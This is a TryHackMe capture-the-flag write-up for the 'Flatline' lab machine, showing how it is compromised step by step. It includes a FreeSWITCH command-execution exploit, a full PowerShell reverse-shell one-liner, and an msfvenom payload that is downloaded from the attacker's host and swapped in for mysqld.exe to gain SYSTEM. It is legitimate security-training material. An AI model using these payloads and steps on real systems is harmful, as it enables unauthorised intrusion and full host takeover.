THM Writeup – Flatline
How low are your morals?
Add IP address to your hosts file:
echo '10.10.143.60 flatline.thm' >> /etc/hostsScan the target machine – find open ports first:
nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv flatline.thm
PORT STATE SERVICE REASON
3389/tcp open ms-wbt-server syn-ack ttl 128
8021/tcp open ftp-proxy syn-ack ttl 128Get more details about open ports:
nmap -T4 -A -p 3389,8021 flatline.thm
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Not valid before: 2021-11-08T16:47:35
|_Not valid after: 2022-05-10T16:47:35
|_ssl-date: 2022-03-08T08:01:07+00:00; 0s from scanner time.
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket3389 – Remote desktop protocol, 8021 – some strange port that runs service named freeswitch.
Let’s first check, if the RDP is vulnerable to BlueKeep – run metasploit and search for bluekeep:
msfconsole
msf5 > search bluekeep
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
1 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After FreeSelect the scanner, configure and run it:
msf5 > use 0
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options
Module options (auxiliary/scanner/rdp/cve_2019_0708_bluekeep):
Name Current Setting Required Description
---- --------------- -------- -----------
RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME rdesktop no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3389 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
Auxiliary action:
Name Description
---- -----------
Scan Scan for exploitable targets
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts flatline.thm
rhosts => flatline.thm
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit
[*] flatline.thm:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) >As we can see the RDP is not vulnerable to BlueKeep in our case – otherwise it would be written in the scanner output.
Now find out what is freeswitch – search for freeswitch github:
According to README.md:
“FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a versatile software implementation that runs on any commodity hardware. From a Raspberry PI to a multi-core server, FreeSWITCH can unlock the telecommunications potential of any device. Combined with our hosted cloud platform, SignalWire, FreeSWITCH can interconnect with the outside world and scale to any size.”
Try to find a way to exploit it – search for freeswitch exploit:
Great, we found an exploit.
Copy the exploit, save it to a file named e.g. exploit.py and make it executable:
nano exploit.py
chmod +x exploit.pyRun the exploit using simple command so we have a proof it works:
root@ip-10-10-237-164:~# python3 exploit.py flatline.thm whoami
Authenticated
Content-Type: api/response
Content-Length: 25
win-eom4pk0578n\nekroticThe exploit works, so now it’s time to get a reverse shell.
Save this PowerShell command (don’t forget to change IP and Port) to a file named e.g. revshell.ps1:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.237.164',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"Setup netcat listener:
nc -lnvp 4242Run the exploit again like this:
python3 exploit.py flatline.thm "$(cat revshell.ps1)"And the reverse connection is received:
Find the user flag and read it:
pwd
Path
----
C:\Program Files\FreeSWITCH
PS C:\Program Files\FreeSWITCH> cd C:\Users
PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 09/11/2021 07:13 Administrator
d----- 09/11/2021 07:37 Nekrotic
d-r--- 09/11/2021 07:13 Public
PS C:\Users> cd Nekrotic\Desktop
PS C:\Users\Nekrotic\Desktop> dir
Directory: C:\Users\Nekrotic\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 09/11/2021 07:39 38 root.txt
-a---- 09/11/2021 07:39 38 user.txt
PS C:\Users\Nekrotic\Desktop> more user.txt
[REDACTED]As we can see there is also root flag, however we don’t have permissions to read it – we have to elevate our privileges to nt\system.
Now let’s do a basic enumeration – see what we can find on the disk:
PS C:\Users\Nekrotic\Desktop> cd C:\
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 15/09/2018 08:19 PerfLogs
d-r--- 09/11/2021 16:41 Program Files
d----- 09/11/2021 07:13 Program Files (x86)
d----- 09/11/2021 07:18 projects
d-r--- 09/11/2021 07:28 Users
d----- 09/11/2021 16:47 WindowsFolder projects looks interesting, let’s check it out:
PS C:\> cd projects
PS C:\projects> dir
Directory: C:\projects
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 09/11/2021 07:29 openclinic
PS C:\projects> cd openclinic
PS C:\projects\openclinic> dir
Directory: C:\projects\openclinic
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 09/11/2021 07:29 jdk1.8
d----- 09/11/2021 07:19 mariadb
d----- 09/11/2021 07:30 tomcat8
d----- 09/11/2021 07:29 Uninstall
-a---- 06/04/2021 23:14 250 configureCountry.bat
-a---- 01/07/2021 18:20 167 configureLanguage.bat
-a---- 09/11/2021 07:18 334840 lua5.1.dll
-a---- 07/06/2021 16:58 93696 OpenClinic GA login.exe
-a---- 08/05/2020 12:17 27136 OpenClinicStartServices.exe
-a---- 02/05/2021 00:45 316 stopOpenClinicHttp.bat
-a---- 09/11/2021 07:18 1389568 uninstall.exeOk, there is another folder openclinic in the projects folder – I guess it is some sort of open-source software.
Find out what openclinic is – search for openclinic:
We know what it is, now find a way to exploit it – either use google or searchsploit.
By googling openclinic exploit:
We found a proof-of-concept:
# Proof of Concept
1. Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe
2. Setup listener and ensure apache is running on attacking machine
nc -lvp 4242
service apache2 start
3. Download malicious .exe on victim machine
type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\projects\openclinic\mariadb\bin\mysqld_evil.exe"
4. Overwrite file and copy malicious .exe.
Renename C:\projects\openclinic\mariadb\bin\mysqld.exe > mysqld.bak
Rename downloaded 'mysqld_evil.exe' file in mysqld.exe
5. Restart victim machine
6. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\systemFollow the PoC:
1. Generate Windows reverse shell (don’t forget to modify IP and Port) and run python http server:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.237.164 LPORT=4444 -f exe > mysqld_evil.exe
python3 -m http.server2. Open another terminal window and setup netcat listener:
nc -lnvp 44443. Go back to terminal with the reverse shell connection, rename mysqld.exe to mysqld.bak and download the malicious .exe file:
PS C:\projects\openclinic> cd mariadb\bin
PS C:\projects\openclinic\mariadb\bin> mv mysqld.exe mysqld.bak
PS C:\projects\openclinic\mariadb\bin> Invoke-WebRequest -Uri http://10.10.237.164:8000/mysqld_evil.exe -Outfile mysqld.exe4. Restart target computer:
PS C:\projects\openclinic\mariadb\bin> Restart-ComputerAfter restart we received a reverse connection:
Check what user are we connected as, go to the Nekrotic’s desktop and read the root flag:
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd C:\Users\Nekrotic\Desktop
cd C:\Users\Nekrotic\Desktop
C:\Users\Nekrotic\Desktop>more root.txt
more root.txt
[REDACTED]Do you like this writeup? Check out other THM Writeups.